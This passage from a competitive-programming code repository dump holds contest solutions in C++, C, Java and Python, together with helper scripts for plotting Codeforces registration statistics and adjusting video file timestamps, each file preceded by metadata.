'contestParticipantCountLinkMargin'}).contents[1][2:])\n addRound([date, count, participants_all.get(cid, 0), title])\n saveJsonInFile([div1, div2, div3, div4, educ, comb, othe], filename)\n if 
stop:\n break\n print('Loaded!')\n sys.exit()\n\nfrom statistics import median\nimport plotly.graph_objects as go\nimport plotly\n\ndata = []\ndef draw(title, rounds):\n if not rounds: return\n rounds = sorted(rounds, key = lambda x: datetime.strptime(x[0], DATE_FORMAT))\n\n dates, counts, participants, titles, *_ = zip(*rounds)\n dates = list(map(lambda date: datetime.strptime(date, DATE_FORMAT), dates))\n print(title, len(rounds))\n nd = [dates[0]]\n nc = [counts[0]]\n np = [participants[0]]\n nt = [[titles[0]]]\n percents = [participants[0] / counts[0]]\n for i in range(1, len(dates)):\n if dates[i] == dates[i - 1]:\n nc[-1] = max(nc[-1], counts[i])\n np[-1] = max(np[-1], participants[i])\n nt[-1].append(titles[i])\n else:\n nd.append(dates[i])\n nc.append(counts[i])\n np.append(participants[i])\n nt.append([titles[i]])\n percents.append(participants[i] / counts[i] if counts[i] > 0 else 0)\n\n dates = nd\n counts = nc\n participants = np\n titles = list(map(lambda t: ', '.join(t), nt))\n\n assert(len(dates) == len(counts))\n assert(len(dates) == len(participants))\n\n data.append(go.Scatter(\n x = dates,\n y = participants,\n text = titles,\n mode = 'markers',\n name = title + ' participants'\n ))\n data.append(go.Scatter(\n x = dates,\n y = counts,\n text = titles,\n mode = 'markers',\n name = title + ' registrants'\n ))\n # data.append(go.Scatter(x = dates, y = percents, name = title + ' participa'))\n\ndraw('div1', div1)\ndraw('div2', div2)\ndraw('div3', div3)\ndraw('educ', educ)\ndraw('comb', comb)\n# draw('othe', othe)\n# draw('div4', div4)\ndef x(t):\n return list(map(lambda g: g.name.find(t) >= 0, data))\n\ndef getButton(t, **kwargs):\n f = kwargs['f'] if 'f' in kwargs else t\n return dict(\n label = t,\n method = 'update',\n args = [{'visible': x(f)}, {'title': t, 'annotations': []}]\n )\n\nroundButtons = [\n getButton('All', f = ''),\n getButton('Par', f = 'part'),\n getButton('Reg', f = 'reg'),\n *[getButton(t) for t in ['div1', 'div2', 'div3', 'educ', 
'comb', 'othe', 'div4']]\n]\n\nfig = go.Figure(data = data)\nfig.update_xaxes(\n rangeslider_visible = True,\n rangeselector = dict(\n buttons = list([\n dict(count = 1, label = '1m', step = 'month', stepmode = 'backward'),\n dict(count = 6, label = '6m', step = 'month', stepmode = 'backward'),\n dict(count = 1, label = 'YTD', step = 'year', stepmode = 'todate'),\n dict(count = 1, label = '1y', step = 'year', stepmode = 'backward'),\n dict(step = 'all')\n ])\n )\n)\n\nfig.update_layout(\n legend_orientation = 'v',\n title = 'Registrants and participants',\n xaxis_title = 'Date',\n yaxis_title = 'Number',\n legend = dict(xanchor = 'center'),\n updatemenus = [\n dict(\n active = 1,\n showactive = True,\n xanchor = 'left',\n yanchor = 'top',\n y = 0,\n buttons = list([\n dict(label = 'Log Scale', method = 'update', args = [{'visible': [True] * len(data)}, {'yaxis': {'type': 'log'}}]),\n dict(label = 'Linear Scale', method = 'update', args = [{'visible': [True] * len(data)}, {'yaxis': {'type': 'linear'}}])\n ]),\n ),\n dict(\n type = 'buttons',\n xanchor = 'left',\n yanchor = 'top',\n y = 1,\n buttons = roundButtons,\n )\n ]\n)\nfig.update_traces(hoverinfo = 'all', hovertemplate = '%{x}, %{y}<br><a href=\"https://codeforces.com\">%{text}</a>')\n# fig.update_layout(xaxis_range = [datetime(2020, 1, 1), datetime(2020, 6, 1)], hovermode = 'x')\nfig.show()\n\ngraphJSON = json.dumps(fig, cls = plotly.utils.PlotlyJSONEncoder)\nwith open('./registrants.json', 'w') as file:\n file.write('const graphs = {};'.format(graphJSON))\n" }, { "alpha_fraction": 0.5896946787834167, "alphanum_fraction": 0.6030534505844116, "avg_line_length": 23.952381134033203, "blob_id": "638357e6cc98799896752d509cb4671d6cea01f7", "content_id": "e9cc4a389f0ccfa34dedb9f2153b4ad8ca59450a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 524, "license_type": "no_license", "max_line_length": 113, "num_lines": 21, "path": "/scripts/checkerInts.cpp", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nstring numberFormat = \"-?[1-9][0-9]*|0\";\n\nstring readAns(InStream& stream)\n{\n return stream.readString(numberFormat);\n}\n\nint main(int argc, char* argv[]) {\n registerTestlibCmd(argc, argv);\n auto ja = readAns(ans);\n auto pa = readAns(ouf);\n if (ja != pa)\n quitf(_wa, \"Test %s: answer is incorrect: expected = %s, found = %s\\n\", argv[1], ja.c_str(), pa.c_str());\n else \n quitf(_ok, \"Test %s: answer is correct!\", argv[1]);\n}\n" }, { "alpha_fraction": 0.4747474789619446, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 98, "blob_id": "7a36bf617e22fa043ca62497647b7972a5b17941", "content_id": "1b6288bba80b72885ad99cd776db39344884fc71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 198, "license_type": "no_license", "max_line_length": 180, "num_lines": 2, "path": "/2017/fbhcQual/A.c", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include<math.h>\nx;y;p;t;main(i){for(scanf(\"%d\",&t);scanf(\"%d%d%d\",&p,&y,&x),x-=50,y-=50,t>=i;)printf(\"Case #%d: %s\\n\",i++,abs(x)>50||abs(y)>50||cos(M_PI*p/50)*x>sin(M_PI*p/50)*y?\"white\":\"black\");}\n" }, { "alpha_fraction": 0.502266526222229, "alphanum_fraction": 0.5347234606742859, "avg_line_length": 30.878612518310547, "blob_id": "2c194f18315f39ef34470ad333e5d26f5b61fa76", "content_id": "03208ad82f900fab1a4d250d8e90b502b3634997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5515, "license_type": "no_license", "max_line_length": 175, "num_lines": 173, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.21/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it 
!= r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"kitchen\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%.14f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint n, m, k;\ndouble w, h, x, y;\ndouble edges[100][100];\ndouble dp[18][(1 << 18) + 1];\n\ndouble dst(double x, double y, double a, double b)\n{\n return sqrt((x - a) * (x - a) + (y - b) * (y - b));\n}\n#define fst first\n#define snd second\n\nvoid run()\n{\n readln(w, h);\n readln(n);\n vector<pair<double, double> > a(n);\n readln(a);\n a.pb({0, 0});\n readln(x, y);\n edges[n][n] = INF;\n double w1, w2, h1, h2, x1, x2, y1, y2, t1, t2, r1, r2;\n fori(n)\n FOR(j, i, n)\n {\n w1 = a[i].fst;\n h1 = a[i].snd;\n w2 = a[j].fst;\n h2 = a[j].snd;\n x1 = (w2 * h1 + w1 * h2) / (h1 + h2);\n t1 = dst(x1, 0, w1, h1) + dst(x1, 0, w2, h2);\n x2 = (w2 * (- h1 + h) + w1 * (- h2 + h)) / (- h1 + 2 * h - h2);\n t2 = dst(x2, h, w1, h1) + dst(x2, h, w2, h2);\n y1 = (w2 * h1 + w1 * h2) / (w1 + w2);\n r1 = dst(0, y1, w1, h1) + dst(0, y1, w2, 
h2);\n y2 = ((- w2 + w) * h1 + (- w1 + w) * h2) / (- w1 + 2 * w - w2);\n r2 = dst(w, y2, w1, h1) + dst(w, y2, w2, h2);\n edges[i + 1][j + 1] = edges[j + 1][i + 1] = min(min(t1, t2), min(r1, r2));\n }\n// n = n + 2;\n fori(n)\n forj(1 << n)\n dp[i][j] = INF;\n\n fori(n)\n dp[i][1 << i] = edges[i][i] / 2;\n for (int mask = 0; mask < (1 << n); mask++)\n for (int i = 0; i < n; i++)\n if ((mask & (1 << i)))\n for (int j = 0; j < n; j++)\n if ((mask & (1 << j)))\n dp[i][mask] = min(dp[i][mask], dp[j][mask ^ (1 << i)] + edges[j + 1][i + 1]);\n double res = INF;\n fori(n)\n res = min(res, dp[i][(1 << n) - 1] + dst(x, y, a[i].fst, a[i].snd));\n writeln(res);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& 
a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.5948103666305542, "alphanum_fraction": 0.6107784509658813, "avg_line_length": 35.65853500366211, "blob_id": "047f9a1b6ce0dffdceba90fd97e04e47b4950972", "content_id": "bb0aae2771308ae80fce8aab9b0db14a173c5752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 91, "num_lines": 41, "path": "/scripts/change_kopter_time.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport re\nimport datetime\nimport shutil\nimport piexif\n\nrootdir = sys.argv[1]\n\ndef updateExifDate(filename, date):\n exif_dict = piexif.load(filename)\n exif_date = date.strftime(\"%Y:%m:%d %H:%M:%S\")\n exif_dict['0th'][piexif.ImageIFD.DateTime] = new_date\n exif_dict['Exif'][piexif.ExifIFD.DateTimeOriginal] = new_date\n exif_dict['Exif'][piexif.ExifIFD.DateTimeDigitized] = new_date\n exif_bytes = piexif.dump(exif_dict)\n piexif.insert(exif_bytes, filename)\n\ndef changeDate(filename, date):\n int_date = int(date.timestamp())\n os.utime(filename, (int_date, int_date))\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n d = re.search(r'VID_(\\d{4})(\\d{2})(\\d{2})_(\\d{2})(\\d{2})(\\d{2})', subdir)\n if not d: continue\n groups = [int(d.group(i)) for i in range(1, 7)]\n date = datetime.datetime(*groups)\n m = re.search(r'(\\d{2})_(\\d{2})_(\\d{2})-outof-(\\d{2})_(\\d{2})_(\\d{2})', file)\n if not m: continue\n groups = [int(m.group(i)) for i in range(1, 7)]\n delta = datetime.timedelta(hours=groups[0], minutes=groups[1], seconds=groups[2])\n date += delta\n # delta = datetime.timedelta(hours=groups[3], minutes=groups[4], seconds=groups[5])\n # date -= delta\n p = os.path.join(subdir, file)\n new_path = os.path.join(rootdir, file)\n # updateExifDate(p, date)\n shutil.copyfile(p, new_path)\n changeDate(p, date)\n changeDate(new_path, date)\n" }, { "alpha_fraction": 
0.43327975273132324, "alphanum_fraction": 0.4549839198589325, "avg_line_length": 31.736841201782227, "blob_id": "a003df7939f53679266374a452d0b26f3c34f60a", "content_id": "4fb3b64389aa6e401ea303bf80e5ec9c2d075191", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 928, "num_lines": 76, "path": "/2013/2013gcj/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint a[102][102];\nbool sosnulllli[102][102];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nchar ans[2][4] = {\"YES\", \"NO\"};\n\nint test()\n{\n int n, m;\n readln(n, m);\n bool f = true;\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n read(a[i + 1][j + 1]);\n/* enter;\n for (int i = 1; i <= n; i++)\n {\n for (int j = 1; j <= m; j++)\n printf(\"%d \", a[i][j]);\n enter;\n }*/\n for (int i = 0; i <= n + 1; i++)\n a[i][0] = 0;\n for (int j = 0; j <= m + 1; j++)\n a[0][j] = 0;\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m; j++)\n a[i][0] = max(a[i][0], a[i][j]),\n a[0][j] = max(a[0][j], a[i][j]);\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m; j++)\n if (a[i][j] < a[i][0] && a[i][j] < a[0][j])\n return true;\n return false;\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%s\\n\", ans[test()]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3956599235534668, "alphanum_fraction": 0.4123067855834961, "avg_line_length": 31.980392456054688, "blob_id": "d8d059bca3b31ee2c3db6acb17aa383398726ae5", "content_id": "760376ae22d1850333162728007562ae0fd83305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3364, "license_type": "no_license", "max_line_length": 88, "num_lines": 102, "path": "/scripts/cf/plotlyTest.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import plotly.graph_objects as go\n\nimport pandas as pd\n\n# Load dataset\ndf = pd.read_csv(\n \"https://raw.githubusercontent.com/plotly/datasets/master/finance-charts-apple.csv\")\ndf.columns = [col.replace(\"AAPL.\", \"\") for col in df.columns]\n\n# Initialize figure\nfig = go.Figure()\n\n# Add Traces\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=list(df.High),\n name=\"High\",\n line=dict(color=\"#33CFA5\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=[df.High.mean()] * len(df.index),\n name=\"High 
Average\",\n visible=False,\n line=dict(color=\"#33CFA5\", dash=\"dash\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=list(df.Low),\n name=\"Low\",\n line=dict(color=\"#F06A6A\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=[df.Low.mean()] * len(df.index),\n name=\"Low Average\",\n visible=False,\n line=dict(color=\"#F06A6A\", dash=\"dash\")))\n\n# Add Annotations and Buttons\nhigh_annotations = [dict(x=\"2016-03-01\",\n y=df.High.mean(),\n xref=\"x\", yref=\"y\",\n text=\"High Average:<br> %.2f\" % df.High.mean(),\n ax=0, ay=-40),\n dict(x=df.High.idxmax(),\n y=df.High.max(),\n xref=\"x\", yref=\"y\",\n text=\"High Max:<br> %.2f\" % df.High.max(),\n ax=0, ay=-40)]\nlow_annotations = [dict(x=\"2015-05-01\",\n y=df.Low.mean(),\n xref=\"x\", yref=\"y\",\n text=\"Low Average:<br> %.2f\" % df.Low.mean(),\n ax=-40, ay=40),\n dict(x=df.High.idxmin(),\n y=df.Low.min(),\n xref=\"x\", yref=\"y\",\n text=\"Low Min:<br> %.2f\" % df.Low.min(),\n ax=0, ay=40)]\n\nfig.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"right\",\n active=0,\n x=0.57,\n y=1.2,\n buttons=list([\n dict(label=\"None\",\n method=\"update\",\n args=[{\"visible\": [True, False, True, False]},\n {\"title\": \"Yahoo\",\n \"annotations\": []}]),\n dict(label=\"High\",\n method=\"update\",\n args=[{\"visible\": [True, True, False, False]},\n {\"title\": \"Yahoo High\",\n \"annotations\": high_annotations}]),\n dict(label=\"Low\",\n method=\"update\",\n args=[{\"visible\": [False, False, True, True]},\n {\"title\": \"Yahoo Low\",\n \"annotations\": low_annotations}]),\n dict(label=\"Both\",\n method=\"update\",\n args=[{\"visible\": [True, True, True, True]},\n {\"title\": \"Yahoo\",\n \"annotations\": high_annotations + low_annotations}]),\n ]),\n )\n ])\n\n# Set title\nfig.update_layout(\n title_text=\"Yahoo\",\n xaxis_domain=[0.05, 1.0]\n)\n\nfig.show()\n" }, { "alpha_fraction": 0.4568462073802948, "alphanum_fraction": 0.4802076518535614, "avg_line_length": 22, 
"blob_id": "d4b1b45e3b55b2cd22436b002811244dd9cd7a16", "content_id": "af55da195bb4911f5d885563d7d16a90cb179e25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1541, "license_type": "no_license", "max_line_length": 143, "num_lines": 67, "path": "/2021/yandexBackendFinal/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\ndef get(url):\n return requests.get('http://127.0.0.1:7777/start/session?login=' + url).json()\ndef post(data):\n r = requests.post('http://127.0.0.1:7777/ls/batch', json=data)\n return r.json()['listings']\n\n\nlogin = input()\nbs = get(login)['max_batch_size']\n\nroot = [{\n 'ok': False,\n 'path': '',\n 'type': 'Folder',\n 'children': [],\n 'size': 1\n}]\n\ndef getPath(p1, p2):\n return (p1 + '/' + p2) if not p1.endswith('/') else (p1 + p2)\n\nr = []\np = []\nsz = 0\n\ndef dfs(root, path):\n global r\n global p\n global sz\n for i in range(len(root)):\n k = root[i]\n if 'ok' in k and k['type'] == 'Folder' and k['size'] > 0 and sz + k['size'] <= bs:\n sz += k['size']\n cur = getPath(path, k['path'])\n if not k['ok']:\n p.append(cur)\n r.append(k)\n dfs(k['children'], cur)\n\nwhile True:\n dfs(root, '/')\n if len(r) == 0:\n break\n read = post({'paths': p})\n for i in range(len(read)):\n r[i]['ok'] = True\n r[i]['children'] = list(map(lambda x: {'ok': False, 'children': [], 'path': x['name'], 'type': x['type'], 'size': x['size']}, read[i]))\n\n p = []\n r = []\n sz = 0\n\ns = []\ndef dfs2(root, path):\n global s\n for i in range(len(root)):\n k = root[i]\n cur = getPath(path, k['path'])\n s.append(cur)\n if 'ok' in k and k['type'] == 'Folder' and k['size'] > 0:\n dfs2(k['children'], cur)\ndfs2(root, '/')\n\nprint(len(s))\nprint(*sorted(s), sep = '\\n')\n" }, { "alpha_fraction": 0.5525786876678467, "alphanum_fraction": 0.5659745335578918, "avg_line_length": 18.389610290527344, "blob_id": "9da3d5d3539a8db194534c5fbaafa801287dced4", "content_id": 
"3037b387891b453d502c841b248696441cc183e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 65, "num_lines": 77, "path": "/2013/2013yandex/C.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\n\npublic class C {\n\n\tint findd(String a, int k, char c) {\n\t\tfor (int i = k; i < 8; i++)\n\t\t\tif (a.charAt(i) == c)\n\t\t\t\treturn i;\n\t\treturn -1;\n\t}\n\n\tvoid run() throws IOException {\n\t\tString a = next();\n\t\tString s = \"0000\";\n\t\tint k = 0, prev = 0;\n\t\tfor (int i = 0; i < 4; i++) {\n\t\t\twhile (findd(a, k, s.charAt(i)) == -1) {\n\t\t\t\tchar c = s.charAt(i);\n\t\t\t\tc++;\n\t\t\t\ts = s.substring(0, i) + c + s.substring(i + 1);\n\t\t\t}\n\n\t\t\tprev = k;\n\t\t\tk = findd(a, k, s.charAt(i)) + 1;\n\t\t\tif (8 - k + 1 < 4 - i) {\n\t\t\t\tchar c = s.charAt(i);\n\t\t\t\tc++;\n\t\t\t\ts = s.substring(0, i) + c + s.substring(i-- + 1);\n\t\t\t\tk = prev;\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\t\tSystem.out.print(s);\n\n\t\tpw.println(s);\n\t}\n\n\tint[] na(int a_len) throws IOException {\n\t\tint[] _a = new int[a_len];\n\t\tfor (int i = 0; i < a_len; i++)\n\t\t\t_a[i] = ni();\n\t\treturn _a;\n\t}\n\n\tString next() throws IOException {\n\t\twhile (st == null || !st.hasMoreTokens())\n\t\t\tst = new StringTokenizer(br.readLine());\n\t\treturn st.nextToken();\n\t}\n\n\tint ni() throws IOException {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() throws IOException {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString nl() throws IOException {\n\t\treturn br.readLine();\n\t}\n\n\tstatic PrintWriter pw;\n\tstatic BufferedReader br;\n\tstatic StringTokenizer st;\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tpw = new PrintWriter(\"number.out\");\n\t\tbr = new BufferedReader(new FileReader(new File(\"number.in\")));\n\n\t\tnew 
C().run();\n\n\t\tbr.close();\n\t\tpw.close();\n\t}\n\n}\n" }, { "alpha_fraction": 0.5197802186012268, "alphanum_fraction": 0.5538461804389954, "avg_line_length": 25.735294342041016, "blob_id": "e4dffaaa0b0f021ee0cf23235410f1e7c3de9879", "content_id": "01be706460f0c58f41affd8dd6bc087f0c0335aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 910, "license_type": "no_license", "max_line_length": 60, "num_lines": 34, "path": "/2023/tin/4.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nf = '%Y-%m-%d'\nnow = datetime.strptime('2023-04-15', f)\ndd = datetime.fromisoformat('2013-01-03T12:00:00.000+03:00')\n\ndef filter_data(text: str) -> str:\n j = json.loads(text)\n ret = []\n for x in j:\n if not 'admin' in x['roles']:\n continue\n dob = datetime.strptime(x['profile']['dob'], f)\n difference = relativedelta(now, dob).years\n if difference < 35:\n continue\n created = datetime.fromisoformat(x['createdAt'])\n if created < dd:\n continue\n\n ret.append({\n \"username\": x['username'],\n \"email\": x['email'],\n \"name\": x['profile']['name'],\n \"age\": difference,\n })\n return json.dumps(ret)\n\n\nif __name__ == \"__main__\":\n input_str = input()\n print(filter_data(input_str))\n\n" }, { "alpha_fraction": 0.49127259850502014, "alphanum_fraction": 0.5061885118484497, "avg_line_length": 27.260089874267578, "blob_id": "3bffeaa8a1303545eec8a3579ade240ad94b793f", "content_id": "7ca98fd0fb66dfe1c24cfb3c3a75a75f542c00a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6302, "license_type": "no_license", "max_line_length": 165, "num_lines": 223, "path": "/CodeForce/0522/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n/*\n#include <ext/rope>\n#include 
<ext/pb_ds/assoc_container.hpp>\n#include <ext/pb_ds/tree_policy.hpp>\n\nusing namespace __gnu_cxx;\nusing namespace __gnu_pbds;\ntypedef tree<int, int/null_type, less<int>, rb_tree_tag, tree_order_statistics_node_update> orderedMap;\n*/\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next _next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000007\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lls(args...) ll args; readln(args)\n#define vints(args...) vi args; readln(args)\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l];\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n 